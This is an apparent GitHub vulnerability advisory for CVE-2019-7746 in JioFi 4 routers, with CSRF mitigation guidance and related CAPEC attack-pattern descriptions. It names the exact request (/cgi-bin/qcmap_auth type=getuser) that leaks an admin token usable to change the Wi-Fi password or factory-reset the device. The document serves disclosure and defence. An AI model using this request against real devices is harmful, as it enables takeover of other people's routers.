Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2024-04-04 00:33JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
{
"affected": [],
"aliases": [
"CVE-2019-7746"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-05-07T19:29:00Z",
"severity": "HIGH"
},
"details": "JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.",
"id": "GHSA-wwj4-pqg8-68wr",
"modified": "2024-04-04T00:33:04Z",
"published": "2022-05-24T16:45:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7746"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/46365"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/151656/Jiofi-4-JMR-1140-Admin-Token-Disclosure-Cross-Site-Request-Forgery.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330]
- Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45]
Mitigation
Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script.
Mitigation
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332]
Mitigation
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Mitigation
- Use the "double-submitted cookie" method as described by Felten and Zeller:
- When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.
- Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.
- This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331]
Mitigation
Do not use the GET method for any request that triggers a state change.
Mitigation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
CAPEC-111: JSON Hijacking (aka JavaScript Hijacking)
An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.
CAPEC-462: Cross-Domain Search Timing
An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.
CAPEC-467: Cross Site Identification
An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the "remember me" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).
CAPEC-62: Cross Site Request Forgery
An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.